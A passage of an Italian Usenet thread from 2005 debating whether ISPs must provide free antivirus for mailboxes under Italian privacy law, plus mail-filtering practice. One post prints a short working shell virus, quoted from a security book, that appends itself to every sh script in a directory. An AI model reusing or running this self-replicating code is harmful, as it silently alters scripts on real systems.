Discussione:
Obblighi del fornitore di servizi email
(troppo vecchio per rispondere)
Brixina
2005-05-18 12:36:45 UTC
Permalink
Un ISP è _obbligato_ in base al D.Lgs 196/03
a fornire un servizio mailbox con *sistema antivirus gratuito* ?

All'art.4, comma 3 per definizione di misure minime di sicurezza
leggiamo:

3. Ai fini del presente codice si intende, altresi', per:
a) "misure minime", il complesso delle misure tecniche, informatiche,
organizzative, logistiche e procedurali di sicurezza che configurano
il livello minimo di protezione richiesto in relazione ai rischi
previsti nell'articolo 31;

Una di queste misure può/deve essere considerato un *sistema
antivirus gratuito* a livello server?
Diversamente ci sono altri riferimenti normativi a riguardo?
O ancora l'ISP può pretendere il pagamento per un servizio antivirus
o lo _deve_ fornire senza costi per l'utente?

Grazie per l'attenzione,
Paola
--
FREE MAILBOX by X-Privat: http://www.x-privat.org/mail.php
In difesa degli animali: http://www.bairo.info/
T&T di Carlo&Paola: http://it.photos.yahoo.com/brixina
~L'anima è piena di stelle cadenti~ (V.Hugo)
Andrew Next
2005-05-18 12:58:05 UTC
Permalink
Post by Brixina
Un ISP è _obbligato_ in base al D.Lgs 196/03
a fornire un servizio mailbox con *sistema antivirus gratuito* ?
Non proprio
Post by Brixina
All'art.4, comma 3 per definizione di misure minime di sicurezza
a) "misure minime", il complesso delle misure tecniche, informatiche,
organizzative, logistiche e procedurali di sicurezza che configurano
il livello minimo di protezione richiesto in relazione ai rischi
previsti nell'articolo 31;
Esatto.
Post by Brixina
Una di queste misure può/deve essere considerato un *sistema
antivirus gratuito* a livello server?
Perche' "gratuito" ? Da dove salta fuori? In che senso gratuito? Il provider
deve rispettare una legge, se lo fa con un antivirus a pagamento o gratuito
sono fatti suoi.
Post by Brixina
Diversamente ci sono altri riferimenti normativi a riguardo?
O ancora l'ISP può pretendere il pagamento per un servizio antivirus
o lo _deve_ fornire senza costi per l'utente?
In quanto privato cittadino puo' fare un po' come vuole, basta che rispetta
la legge:
puo' dire ai propri clienti che l'abbonamento costa 10x al mese piu' 5x
l'anno per l'antivirus
puo' dire che l'abonamento costa 11 al mese e l'antivirus e' gratis...
puo' dire quello che vuole, basta che al primo virus sconosciuto il sistema
non vada a donne perdute, perche' allora... altro che rigori di legge! Un
server di posta (di un provider) che va a (pardon) puttane ha conseguenze
nefaste sul piano economico di gran lunga peggiori di quelle giuridiche.
Post by Brixina
A<
Brixina
2005-05-18 13:09:32 UTC
Permalink
il giorno 18 mag 2005 "Andrew Next"
Post by Andrew Next
Perche' "gratuito" ? Da dove salta fuori?
Lunga da spiegare..
Post by Andrew Next
In che senso gratuito?
Nel senso che un utente possa _pretendere_ che un servizio antivirus
debba essere fornito gratuitamente insieme alla casella email (anche
essa gratuita) e che possa viceversa ritenere illegittimo che il
servizio antivirus venga fatto pagare a parte, come servizio 'plus',
aggiuntivo.
Post by Andrew Next
Il provider deve rispettare una legge, se lo fa con un antivirus
a pagamento o gratuito sono fatti suoi.
Ecco, questo mi interessa.
--
FREE MAILBOX by X-Privat: http://www.x-privat.org/mail.php
In difesa degli animali: http://www.bairo.info/
T&T di Carlo&Paola: http://it.photos.yahoo.com/brixina
~L'anima è piena di stelle cadenti~ (V.Hugo)
Andrew Next
2005-05-18 14:47:22 UTC
Permalink
Post by Brixina
il giorno 18 mag 2005 "Andrew Next"
Post by Andrew Next
Perche' "gratuito" ? Da dove salta fuori?
Lunga da spiegare..
Post by Andrew Next
In che senso gratuito?
Nel senso che un utente possa _pretendere_ che un servizio antivirus
debba essere fornito gratuitamente insieme alla casella email (anche
essa gratuita) e che possa viceversa ritenere illegittimo che il
servizio antivirus venga fatto pagare a parte, come servizio 'plus',
aggiuntivo.
Post by Andrew Next
Il provider deve rispettare una legge, se lo fa con un antivirus
a pagamento o gratuito sono fatti suoi.
Ecco, questo mi interessa.
E quindi e' una cosa un pelo diversa:
quello che l'utente puo' pretendere e' che siano prese, almeno, le misure
minime di sicurezza.

Quello che gli utenti non sanno e' che le misure minime di sicurezza sono
ridicole, rispetto a quello che un provider normalmente fa per garantire il
servizio agli utenti.

Ad esempio: il controllo antivirus c'e' sempre, e' sempre attivo e guai a
non usarlo: basta che un solo utente si infetti per fare danni e se
l'infezione si propaga ad altri utenti si verificano due effetti micidiali:
1) Si supera la quota di traffico mensile
2) Il server va in blocco

Il punto due provoca una valanga di telefonate inferocite al call center e,
nel lungo periodo, la perdita di qualche abbonato
Il punto uno provoca la lievitazione dei costi della connettivita.

Di fronte a questi rischi meglio "regalare" l'antivirus agli utenti: costa
meno.
Post by Brixina
A<
OneNET Trieste
2005-05-18 15:16:53 UTC
Permalink
Post by Andrew Next
Post by Brixina
il giorno 18 mag 2005 "Andrew Next"
Post by Andrew Next
Perche' "gratuito" ? Da dove salta fuori?
Lunga da spiegare..
Post by Andrew Next
In che senso gratuito?
Nel senso che un utente possa _pretendere_ che un servizio antivirus
debba essere fornito gratuitamente insieme alla casella email (anche
essa gratuita) e che possa viceversa ritenere illegittimo che il
servizio antivirus venga fatto pagare a parte, come servizio 'plus',
aggiuntivo.
Post by Andrew Next
Il provider deve rispettare una legge, se lo fa con un antivirus
a pagamento o gratuito sono fatti suoi.
Ecco, questo mi interessa.
quello che l'utente puo' pretendere e' che siano prese, almeno, le misure
minime di sicurezza.
Quello che gli utenti non sanno e' che le misure minime di sicurezza sono
ridicole, rispetto a quello che un provider normalmente fa per garantire il
servizio agli utenti.
[SNIP]

Secondo me va distinto l'antivirus che protegge il *server di posta* dal
servizio antivirus che protegge le *singole caselle*.
Capisco che con windows (ossia server windows + clienti windows) la cosa
possa combaciare, ma su sistemi diversi no.
Altrimenti bisognerebbe che tutti gli antivirus versione server
proteggessero contro tutti i virus, di tutti i sistemi operativi
utilizzabili dai clienti.
Esempio pratico: se usi server Mac (o Linux per quel poco che so),
l'antivirus puoi anche non metterlo, il tuo server non ne risentirà
minimamente ;) ma i tuoi clienti windows potrebbero ricevere file
infetti. Vale anche viceversa: se usi server Windows, se non hai
antivirus ti si può bloccare il server, ma magari i tuoi clienti su Mac
sono tranquilli lo stesso.

Morale: secondo me sei a posto con le misure di sicurezza se proteggi il
tuo server ed i dati contenuti, ma penso che il servizio lato cliente
vada visto come servizio aggiuntivo.

Gabriele
Andrew Next
2005-05-18 17:04:19 UTC
Permalink
[...]
Post by OneNET Trieste
Secondo me va distinto l'antivirus che protegge il *server di posta* dal
servizio antivirus che protegge le *singole caselle*.
Non proprio: gli antivirus che proteggono i server di posta filtrano i
messaggi in arrivo alla ricerca della firma di un virus, lasciando poi al
web server cosa fare del messaggio con allegato infetto:
tentare di disinfettare indi eliminare l'allegato
rispedire il messaggio al mittente (pessima idea)
spedire un avviso al mittente che lo avverte del virus e segare l'allegato
e avvisare il destinatario dell'avvenuta cancellazione.
Post by OneNET Trieste
Capisco che con windows (ossia server windows + clienti windows) la cosa
possa combaciare, ma su sistemi diversi no.
Un virus, per un programma di virus, e' un file con una certa serie di 1 e 0
che viene riconosciuta come "impronta digitale"(sign) di un virus.
Post by OneNET Trieste
Altrimenti bisognerebbe che tutti gli antivirus versione server
[...]
Post by OneNET Trieste
sono tranquilli lo stesso.
Morale: secondo me sei a posto con le misure di sicurezza se proteggi il
tuo server ed i dati contenuti, ma penso che il servizio lato cliente
vada visto come servizio aggiuntivo.
Forse la scansione del contenuto della casella, ma i filtri sul traffico in
entrata e uscita, quelli ci sono e non credo che un provider sano di mente
ne farebbe a meno.
La scansione del contenuto di una casella di posta, si, quella puo' essere
considerata un servizio aggiuntivo da pagare a parte, ma imho bastano i
filtri antivirus e un po' di buon senso quando si apre la posta.
Post by OneNET Trieste
A<
-Fabio-
2005-05-20 18:10:21 UTC
Permalink
Andrew Next in data mercoledì, 18/05/2005 scrisse:

Scusa ma temo tu faccia un po' di confusione.
Post by Andrew Next
Non proprio: gli antivirus che proteggono i server di posta filtrano i
messaggi in arrivo alla ricerca della firma di un virus, lasciando poi al web
Cosa c'entra il web server? Normalmente la posta segue questo percorso
per la consegna:
- la invii al server smtp del tuo provider
- l'smtp del provider contatta l'smtp del destinatario
- se il messaggio è per un utente del server destinatario e rispetta
certe regole viene accettato
- viene eseguita la scansione tramite uno script o un programma che
richiama un antivirus
- se l'allegato non è infetto viene consegnato nella mailbox

In tutto questo il web server c'entra come i cavoli a merenda, scusa il
brutto paragone :-)
Magari c'è pure qualcuno che mangia cavoli a merenda, però è anomalo
:-))
Post by Andrew Next
tentare di disinfettare indi eliminare l'allegato
rispedire il messaggio al mittente (pessima idea)
spedire un avviso al mittente che lo avverte del virus e segare l'allegato
e avvisare il destinatario dell'avvenuta cancellazione.
Un server configurato seriamente secondo me si deve comportare
all'incirca così:
- eliminare l'allegato sospetto archiviandolo in una cartella di
quarantena sul server
- mandare un messaggio al destinatario fornendo tutti i dati (tipo di
virus, nome del file, ecc.) e lasciando il messaggio originale, o al
massimo aggiungendo un tag nell'oggetto per permettere all'utente che
non vuole ricevere gli avvisi di cancellare i messaggi senza nemmeno
scaricarli.

Cancellare direttamente il messaggio con il virus allegato è la
soluzione migliore se non si vuole avere traffico inutile ma temo che
in caso di falso positivo metta a rischio di denunce per sottrazione di
corrispondenza, quindi ci andrei con i piedi di piombo.
Post by Andrew Next
Forse la scansione del contenuto della casella, ma i filtri sul traffico in
entrata e uscita, quelli ci sono e non credo che un provider sano di mente ne
farebbe a meno.
Pensi che se arriva una mail infetta o se viene caricato via ftp
qualche virus il server si infetti automaticamente?
Beh, se viene usato anche come client o se è configurato alla membro di
segugio può anche accadere :-)
Post by Andrew Next
La scansione del contenuto di una casella di posta, si, quella puo' essere
considerata un servizio aggiuntivo da pagare a parte, ma imho bastano i
filtri antivirus e un po' di buon senso quando si apre la posta.
Concordo, ho avuto per anni un pc win2000 senza protezione real time e
non ho mai avuto problemi con virus, basta usare la testa, avere un
minimo di conoscenze informatiche e un buon programma di posta e tutto
è risolto.

Un utente che non usa il cervello è in pericolo anche con l'antivirus.

Ciao
Fabio
OneNET Trieste
2005-05-21 08:56:22 UTC
Permalink
Post by Andrew Next
[...]
Post by OneNET Trieste
Secondo me va distinto l'antivirus che protegge il *server di posta* dal
servizio antivirus che protegge le *singole caselle*.
Non proprio: gli antivirus che proteggono i server di posta filtrano i
messaggi in arrivo alla ricerca della firma di un virus, lasciando poi al
tentare di disinfettare indi eliminare l'allegato
rispedire il messaggio al mittente (pessima idea)
spedire un avviso al mittente che lo avverte del virus e segare l'allegato
e avvisare il destinatario dell'avvenuta cancellazione.
Mi dispiace, ma non sono d'accordo. Forse mi sono spiegato male: per
"server di posta" io intendevo la macchina che fisicamente ospita un
determinato programma che serve a gestire la posta. E quindi ribadisco
che dipende dal sistema operativo, dal sw che fa da server di posta e
dal sistema usato contro i virus.
Che poi spesso lo stesso sw antivirus controlli sia il server in sè che
il traffico in/out e pure il contenuto delle caselle è un altro discorso
ed infatti io tendo a distinguere le varie fasi.
Post by Andrew Next
Post by OneNET Trieste
Capisco che con windows (ossia server windows + clienti windows) la cosa
possa combaciare, ma su sistemi diversi no.
Un virus, per un programma di virus, e' un file con una certa serie di 1 e 0
che viene riconosciuta come "impronta digitale"(sign) di un virus.
No. Ripeto quanto scritto sotto; ad es io uso un server Mac, me ne
potrei fregare altamente dei virus per quanto riguarda il corretto
funzionamento della macchina!
Ho un antivirus ugualmente, così per scrupolo, ma per le *caselle* uso
un metodo diverso che lavora assieme al sw "server di posta", ma sono
due cose completamente distinte.
Post by Andrew Next
Post by OneNET Trieste
Altrimenti bisognerebbe che tutti gli antivirus versione server
[...]
Post by OneNET Trieste
sono tranquilli lo stesso.
Morale: secondo me sei a posto con le misure di sicurezza se proteggi il
tuo server ed i dati contenuti, ma penso che il servizio lato cliente
vada visto come servizio aggiuntivo.
Forse la scansione del contenuto della casella, ma i filtri sul traffico in
entrata e uscita, quelli ci sono e non credo che un provider sano di mente
ne farebbe a meno.
Ehm scusa ma che differenza fai tu tra "scansione del contenuto" e
"filtri entrata/uscita" ? filtri di cosa ?

Gabriele
Andrew Next
2005-05-21 10:27:11 UTC
Permalink
[...]
Post by OneNET Trieste
No. Ripeto quanto scritto sotto; ad es io uso un server Mac, me ne
potrei fregare altamente dei virus per quanto riguarda il corretto
funzionamento della macchina!
'spe.
Allora il tuo server POP2/IMAP/sarcazz (prima ho sbagliato a chiamarlo
"server web", chiedo scusa) gira sotto Mac, anzi meglio, gira su un sistema
operativo non standard e creato all'uopo sicche' nessun virus e' in grado di
attaccarlo.
Hai 200 utenti windows, 100 utenti mac e 10 utenti linux, di cui non te ne
puo' f.... di cui non te ne cale un picchio (un piccolo provider, insomma).
Uno dei 200 winusers e' un emerito c...ne e apre gli allegati con il famoso
metodo cinofallico (prima eseguo, poi mi preoccupo) e, ma che strano, si
becca il solito clone di melissa.
Purtroppo, oltre ad essere imbecille e' imbecille pieno di soldi (di solito
le due cose fanno coppia) e ha una banda da 2mbit/0.5mbit in upstream con
512 mbit di bmg.
Il vermiciattolo comincia il suo lavoro e ogni giorno spedisce copie di se
stesso: prende i 100 indirizzi contenuti nella rubrica e per ogni indirizzo
presente spedisce una copia agli altri 99, per un totale di 9801 messaggi. A
50k a messaggio fanno piu' di 400mb al giorno, poi diciamo che il virus e'
un po' intelligente e quindi non satura la banda dell'utente, senno' viene
sgamato e si limita a trasmettere un po' di messaggi per volta, quindi si
scende sotto i 100mB/giorno (la volpe sta connessa h24 perche' fa figo,
anche se poi non usa la banda).
Se gli imbecilli sono due, pero' gia' l'affare si complica e con 4 idioti
tra i 200 win users (ma mettiamocene pure uno tra i mac) ecco che il tuo
bellissimo server con software interamente scritto da te e quindi
virtualmente inattaccabile e' stato intasato da un virus che ha colpito
anche gli utenti sani (non riescono piu' a scaricare la posta).
Se il virus e' scritto bene, questo iniziera' a cercare altri indirizzi di
posta via internet (i virus piu' recenti scaricano gli aggiornamenti da
internet) e il tuo utente cosi' intelligente diventera' una bell'ufficio
postale per spammers e virus, con tutti i danni che cio' comporta.
Post by OneNET Trieste
Ho un antivirus ugualmente, così per scrupolo, ma per le *caselle* uso
un metodo diverso che lavora assieme al sw "server di posta", ma sono
due cose completamente distinte.
Il che va benissimo, l'importante e' che non accada quanto descritto sopra
(o peggio) perche' il danno e' di gran lunga peggiore di quello che puo'
causare un virus, direttamente, al server di posta. Il succo e' che le
misure "minime" di sicurezza non sono affatto il minimo indispensabile per
garantire il servizio, che invece richiede accorgimenti superiori.
Insomma gli accorgimenti minimi per tenere in piedi il servizio di posta
elettronica includono quelli che sono gli accorgimenti minimi previsti dalla
legge.
Post by OneNET Trieste
Post by OneNET Trieste
Altrimenti bisognerebbe che tutti gli antivirus versione server
[...]
Post by OneNET Trieste
sono tranquilli lo stesso.
Morale: secondo me sei a posto con le misure di sicurezza se proteggi il
tuo server ed i dati contenuti, ma penso che il servizio lato cliente
vada visto come servizio aggiuntivo.
Forse la scansione del contenuto della casella, ma i filtri sul traffico in
entrata e uscita, quelli ci sono e non credo che un provider sano di mente
ne farebbe a meno.
Ehm scusa ma che differenza fai tu tra "scansione del contenuto" e
"filtri entrata/uscita" ? filtri di cosa ?
Un programma che agisce allo stesso livello del firewall (o immediatamente a
valle: tra il firewall e il server di posta pop/imap) cosi' si elimina il
rischio che l'utente riesca a prendere il messaggio prima della scansione
(si lo so che e' una cosa estremamente remota, ma la sfiga: esiste, ci vede
e ha ottima mira).
Post by OneNET Trieste
A<
ab
2005-05-21 11:23:43 UTC
Permalink
Post by Andrew Next
Allora il tuo server POP2/IMAP/sarcazz (prima ho sbagliato a chiamarlo
"server web", chiedo scusa) gira sotto Mac, anzi meglio, gira su un
sistema operativo non standard e creato all'uopo sicche' nessun virus e'
in grado di attaccarlo.
Abbastanza vero all'atto pratico, tuttavia sfatiamo che esistano S.O. immuni
dai virus. Unix (e tutti i suoi derivati) ne hanno --anzi virus, worm & Co.
sono nati sotto Unix. Mac ha i suoi. Anche i mainframe hanno i loro.

La stragrande maggioranza dei virus/worm in circolazione hanno come
bersaglio MS, quindi se usi un altro sistema operativo le probabilita' di
prenderti un virus/worm sono basse, molto basse, ma non zero.

Eccoti un esempio (banale) di virus sotto Unix -- che nella sua semplicita'
ha una caratteristica micidiale, di essere trasportabile sotto qualunque
Unix, Linux, e qualunque cosa finisca con X purche' dotato di interprete
shell:

NB: a parte replicare se stesso questo virus non fa nient'altro:

-.-.-.-

#!/bin/sh

for i in *
do case "`sed 1q $i`" in
"#!/bin/sh")
grep '#virus#' $i > /dev/null || sed -n '/#virus#/,$p' $0 >> $i
esac
done 2>/dev/null

.-.-.-.

(preso dal libro "Unix System Security" di David A. Curry)

Per favore, iniettalo da solo nel tuo sistema sono troppo pigro per
inventarmi un metodo di trasporto... ;-))))
--
AB
OneNET Trieste
2005-05-21 14:41:06 UTC
Permalink
Post by Andrew Next
[...]
Post by OneNET Trieste
No. Ripeto quanto scritto sotto; ad es io uso un server Mac, me ne
potrei fregare altamente dei virus per quanto riguarda il corretto
funzionamento della macchina!
'spe.
Allora il tuo server POP2/IMAP/sarcazz (prima ho sbagliato a chiamarlo
"server web", chiedo scusa) gira sotto Mac, anzi meglio, gira su un sistema
operativo non standard e creato all'uopo sicche' nessun virus e' in grado di
attaccarlo.
[snip ma ok è chiaro]
Post by Andrew Next
Se gli imbecilli sono due, pero' gia' l'affare si complica e con 4 idioti
tra i 200 win users (ma mettiamocene pure uno tra i mac) ecco che il tuo
bellissimo server con software interamente scritto da te e quindi
virtualmente inattaccabile e' stato intasato da un virus che ha colpito
anche gli utenti sani (non riescono piu' a scaricare la posta).
Se il virus e' scritto bene, questo iniziera' a cercare altri indirizzi di
posta via internet (i virus piu' recenti scaricano gli aggiornamenti da
internet) e il tuo utente cosi' intelligente diventera' una bell'ufficio
postale per spammers e virus, con tutti i danni che cio' comporta.
Teoricamente è un bel ragionamento, ma di solito i virus non usano
l'smtp dell'ISP per spedirsi, quindi non ci sarà alcun intasamento del
server di posta.
E' proprio per questo che si usano le blacklist sugli IP dinamici e non
si dovrebbe accettare il direct-to-MX. Non serve scansionare, né avere
un antivirus, li seghi sul nascere!

[SNIP]
Post by Andrew Next
Post by OneNET Trieste
Ehm scusa ma che differenza fai tu tra "scansione del contenuto" e
"filtri entrata/uscita" ? filtri di cosa ?
Un programma che agisce allo stesso livello del firewall (o immediatamente a
valle: tra il firewall e il server di posta pop/imap) cosi' si elimina il
rischio che l'utente riesca a prendere il messaggio prima della scansione
(si lo so che e' una cosa estremamente remota, ma la sfiga: esiste, ci vede
e ha ottima mira).
Ah ma allora parliamo all'incirca della stessa cosa.
Per questo vanno bene le blacklist e vari check sugli headers, nonché
sul tipo di estensione di eventuali allegati.

Gabriele
Brixina
2005-05-19 06:28:30 UTC
Permalink
il giorno 18 mag 2005 "Andrew Next"
Post by Andrew Next
quello che l'utente puo' pretendere e' che siano prese, almeno,
le misure minime di sicurezza.
Fin qui ci sono
Post by Andrew Next
Quello che gli utenti non sanno e' che le misure minime di
sicurezza sono ridicole, rispetto a quello che un provider
normalmente fa per garantire il servizio agli utenti.
Ad esempio: il controllo antivirus c'e' sempre, e' sempre attivo
e guai a non usarlo: basta che un solo utente si infetti per
fare danni e se l'infezione si propaga ad altri utenti si
verificano due effetti micidiali: 1) Si supera la quota di
traffico mensile 2) Il server va in blocco
Il controllo antivirus c'è sempre in che senso? Che deve esserci a
monte? Che questa può essere considerata una misura minima di
sicurezza?
Post by Andrew Next
Il punto due provoca una valanga di telefonate inferocite al
call center e, nel lungo periodo, la perdita di qualche abbonato
Il punto uno provoca la lievitazione dei costi della
connettivita.
Di fronte a questi rischi meglio "regalare" l'antivirus agli
utenti: costa meno.
Pienamente d'accordo.
--
FREE MAILBOX by X-Privat: http://www.x-privat.org/mail.php
In difesa degli animali: http://www.bairo.info/
T&T di Carlo&Paola: http://it.photos.yahoo.com/brixina
~L'anima è piena di stelle cadenti~ (V.Hugo)
Roberto Tagliaferri
2005-05-19 10:48:05 UTC
Permalink
Post by Andrew Next
Ad esempio: il controllo antivirus c'e' sempre, e' sempre attivo e guai a
non usarlo: basta che un solo utente si infetti per fare danni e se
1) Si supera la quota di traffico mensile
2) Il server va in blocco
Per caso è quello che sta succedendo ai server di tin?
***@dns:~# mailq|grep refused
(connect to smtp.tin.it[62.211.72.32]: server refused mail
service)
(connect to smtp.tin.it[62.211.72.32]: server refused mail
service)
(connect to smtp.tin.it[62.211.72.32]: server refused mail
service)
(connect to mxrm.virgilio.it[62.211.72.33]: server refused mail
service)
(connect to mxrm.virgilio.it[62.211.72.32]: server refused mail
service)
(connect to mxrm.virgilio.it[62.211.72.33]: server refused mail
service)
(connect to smtp.tin.it[62.211.72.32]: server refused mail
service)
(connect to smtp.tin.it[62.211.72.32]: server refused mail
service)
(connect to mxrm.virgilio.it[62.211.72.32]: server refused mail
service)
(connect to smtp.tin.it[62.211.72.32]: server refused mail
service)
(connect to phobos.ientrymail.com[66.28.139.25]: Connection
refused)
(connect to smtp.tin.it[62.211.72.32]: server refused mail
service)
(connect to smtp.tin.it[62.211.72.33]: server refused mail
service)
(connect to mxrm.virgilio.it[62.211.72.32]: server refused mail
service)
(connect to smtp.tin.it[62.211.72.33]: server refused mail
service)
(connect to smtp.tin.it[62.211.72.33]: server refused mail
service)
(connect to mxrm.virgilio.it[62.211.72.33]: server refused mail
service)
--
Roberto Tagliaferri-Linux user #30785 <-> r.tagliaferri@(forse)tosnet.it
La torre di Pisa... E se avesse ragione lei?
-- Walter Waldi
Andrew Next
2005-05-20 07:37:06 UTC
Permalink
Post by Roberto Tagliaferri
Post by Andrew Next
Ad esempio: il controllo antivirus c'e' sempre, e' sempre attivo e guai a
non usarlo: basta che un solo utente si infetti per fare danni e se
1) Si supera la quota di traffico mensile
2) Il server va in blocco
Per caso è quello che sta succedendo ai server di tin?
[...]
Post by Roberto Tagliaferri
(connect to mxrm.virgilio.it[62.211.72.33]: server refused mail
service)
Cosa te lo fa pensare ?
(grin)
Ach! Il ferme del kakkien...
(kakkienworm)

Comunque loro se lo possono permettere.
Post by Roberto Tagliaferri
A<
Roberto Tagliaferri
2005-05-20 08:01:36 UTC
Permalink
Post by Andrew Next
Post by Roberto Tagliaferri
(connect to mxrm.virgilio.it[62.211.72.33]: server refused mail
service)
Cosa te lo fa pensare ?
(grin)
Ach! Il ferme del kakkien...
(kakkienworm)
Comunque loro se lo possono permettere.
nel senso che tanto c'è il 187&191 che filtra e che ai piani alti non
arriva niente?
Mi fa incacchiare il fatto che comunque i miei clienti si lamentano con
me...
--
Roberto Tagliaferri-Linux user #30785 <-> r.tagliaferri@(forse)tosnet.it
Non e' che ho paura di morire. E' che non vorrei essere li' quando
succede.
-- Woody Allen
Candido
2005-05-18 18:09:29 UTC
Permalink
Post by Brixina
Un ISP è _obbligato_ in base al D.Lgs 196/03
a fornire un servizio mailbox con *sistema antivirus gratuito* ?
Direi proprio di no.
--
Candido - ICQ: 10334649 - Skype: candido2k - MSN: ***@gmail.com
ab
2005-05-18 18:16:21 UTC
Permalink
Post by Brixina
Un ISP è _obbligato_ in base al D.Lgs 196/03
a fornire un servizio mailbox con *sistema antivirus gratuito* ?
Non non è obbligato nei confronti dell'utente. Lo è nei confronti di se
stesso (deve proteggere i suoi server).
Post by Brixina
All'art.4, comma 3 per definizione di misure minime di sicurezza
a) "misure minime", il complesso delle misure tecniche, informatiche,
organizzative, logistiche e procedurali di sicurezza che configurano
il livello minimo di protezione richiesto in relazione ai rischi
previsti nell'articolo 31;
Queste misure minime si riferiscono ai dati personali. Una email non
contiene necessariamente dati personali e se li contiene non sono affaracci
del provider. Se invece il server contiene dati personali (per esempio dei
propri utenti), allora il server va protetto -- se con antivirus od altro
sono affari del provider.

Per fare un confronto col mondo non informatico: l'ufficio postale ti
controlla la posta cartacea per filtrarti scocciatori, pubblicità
indesiderate o lettere minatorie? No. L'ufficio postale è quello che nel
diritto internazionale è detto "common carrier". Purchè tu ci metta il
francobollo, loro _devono_ consegnare.

Se gli ISP quindici anni fa avessero seguito la stessa strada senza entrare
nel merito dei contenuti, oggi vivrebbero più tranquilli passando pacchetti
IP da un capo all'altro senza preoccuparsi di altro. Invece, entrando nel
merito dei contenuti hanno perso lo status di common carrier e quindi sono
più simili ad un tipografo che ad un ufficio postale.
Post by Brixina
Una di queste misure può/deve essere considerato un *sistema
antivirus gratuito* a livello server?
Diversamente ci sono altri riferimenti normativi a riguardo?
O ancora l'ISP può pretendere il pagamento per un servizio antivirus
o lo _deve_ fornire senza costi per l'utente?
Nei confronti dell'utente il provider _deve_ poco. Se e come proteggere i
_miei_ messaggi di posta elettronica sono affari miei, non del provider. Se
poi voglio chiedere un servizio antivirus al provider, se me lo da tanto
meglio. Se me lo da gratis posso anche essere contento, ma essendo quel
paranoico che sono, se me lo da gratis sospetto subito che valga poco...
--
AB
Brixina
2005-05-19 06:37:51 UTC
Permalink
Post by ab
Queste misure minime si riferiscono ai dati personali. Una email
non contiene necessariamente dati personali e se li contiene non
sono affaracci del provider. Se invece il server contiene dati
personali (per esempio dei propri utenti), allora il server va
protetto -- se con antivirus od altro sono affari del provider.
Beh dipende. Mi ricordo ancora del virus Magister che inseriva nel
body parti di documenti presi dal pc infettato.

[..]
Post by ab
Se e come proteggere i _miei_ messaggi di posta elettronica sono
affari miei, non del provider.
Anche qui. Dipende di cosa stiamo parlando.
Secondo me a livello server comunque un antivirus deve starci.
Post by ab
Se poi voglio chiedere un servizio
antivirus al provider, se me lo da tanto meglio. Se me lo da
gratis posso anche essere contento, ma essendo quel paranoico
che sono, se me lo da gratis sospetto subito che valga poco...
Non è sempre cosi. Se ti da l'antivirus gratis potrebbe essere perchè
magari crede sia opportuno investire su questi strumenti piuttosto
che sopportare le conseguenze di non averlo fatto.
--
FREE MAILBOX by X-Privat: http://www.x-privat.org/mail.php
In difesa degli animali: http://www.bairo.info/
T&T di Carlo&Paola: http://it.photos.yahoo.com/brixina
~L'anima è piena di stelle cadenti~ (V.Hugo)
ab
2005-05-19 13:02:26 UTC
Permalink
Post by Brixina
Post by ab
Queste misure minime si riferiscono ai dati personali. Una email
non contiene necessariamente dati personali e se li contiene non
sono affaracci del provider. Se invece il server contiene dati
personali (per esempio dei propri utenti), allora il server va
protetto -- se con antivirus od altro sono affari del provider.
Beh dipende. Mi ricordo ancora del virus Magister che inseriva nel
body parti di documenti presi dal pc infettato.
Sono d'accordo che dipende, infatti ho scritto "non contiene
_necessariamente_ ..." :-)
Post by Brixina
[..]
Post by ab
Se e come proteggere i _miei_ messaggi di posta elettronica sono
affari miei, non del provider.
Anche qui. Dipende di cosa stiamo parlando.
Secondo me a livello server comunque un antivirus deve starci.
Sono d'accordo (e infatti l'ho scritto nel mio post precedente).
Post by Brixina
Post by ab
Se poi voglio chiedere un servizio
antivirus al provider, se me lo da tanto meglio. Se me lo da
gratis posso anche essere contento, ma essendo quel paranoico
che sono, se me lo da gratis sospetto subito che valga poco...
Non è sempre cosi. Se ti da l'antivirus gratis potrebbe essere perchè
magari crede sia opportuno investire su questi strumenti piuttosto
che sopportare le conseguenze di non averlo fatto.
D'accordo anche su questo, infatti ho premesso che il ragionamento era da
paranoico :-) . Comunque, se il provider mi fornisce l'AV per il motivo che
tu dici (e che è legittimo), allora è più corretto dire che me lo da
"compreso nel prezzo", piuttosto che "gratis".

Non è semantica. Se il provider me lo da senza costi aggiuntivi facendo i
suoi conti e decidendo che ha ancora margine di guadagno, allora diventa
parte integrante del servizio e deve funzionare come tutto il resto ed
insieme a tutto il resto.

In ogni caso, io cliente devo poter decidere se volerlo o meno, altrimenti
se me lo impongono unilateralmente sussistono due problemi per il provider:

-1- la volta che l'anti-virus becca un falso positivo e me lo intercetta
(mette in quarantena o peggio cancella), questo diventa intercettazione o
sottrazione di corrispondenza -- uno dei reati più gravi dopo l'omicidio,
il sequestro di persona ed il furto di cosa esposta alla pubblica
fede... ;---)

-2- la volta che un messaggio con il virus non è intercettato e mi arriva,
il cliente (che a questo punto ha l'aspettativa di essere protetto)
potrebbe anche rivalersi sul provider.


Rimango dell'idea che l'anti-virus è una buona idea (come del resto dici tu)
dal lato server. Entrare nel merito della corrispondenza dei propri clienti
invece mi lascia perplesso sia sul piano etico, che quello commerciale che
quello tecnico-legale....
--
AB
Brixina
2005-05-20 07:50:36 UTC
Permalink
Post by ab
D'accordo anche su questo, infatti ho premesso che il
ragionamento era da paranoico :-) .
Forse sono troppo pignola anche io, ma quando mi vengono dubbi di
questo tipo preferisco farmi una paranoia in piu' che una in meno :)

[..]
Post by ab
Rimango dell'idea che l'anti-virus Ú una buona idea (come del
resto dici tu) dal lato server. Entrare nel merito della
corrispondenza dei propri clienti invece mi lascia perplesso sia
sul piano etico, che quello commerciale che quello
tecnico-legale....
Perfettamente d'accordo su tutto.
--
GIGAMAIL by X-Privat: http://www.x-privat.org/gigamail.php
T&T di Carlo&Paola: http://it.photos.yahoo.com/brixina
In difesa degli animali: http://www.bairo.info/
** Vivisezione: nessuno scopo è così alto da giustificare
metodi così indegni** (Albert Einstein)
avv. Daniele NK-X-TODEL918a
2005-05-20 09:12:33 UTC
Permalink
Post by Brixina
Un ISP è _obbligato_ in base al D.Lgs 196/03
a fornire un servizio mailbox con *sistema antivirus gratuito* ?
All'art.4, comma 3 per definizione di misure minime di sicurezza
a) "misure minime", il complesso delle misure tecniche, informatiche,
organizzative, logistiche e procedurali di sicurezza che configurano
il livello minimo di protezione richiesto in relazione ai rischi
previsti nell'articolo 31;
Una di queste misure può/deve essere considerato un *sistema
antivirus gratuito* a livello server?
Diversamente ci sono altri riferimenti normativi a riguardo?
O ancora l'ISP può pretendere il pagamento per un servizio antivirus
o lo _deve_ fornire senza costi per l'utente?
** Non per fare il ruffiano con le donne - e, comunque, non me ne voglia
Andrew che e' sempre molto attivo - ma la questione e' molto interessante e
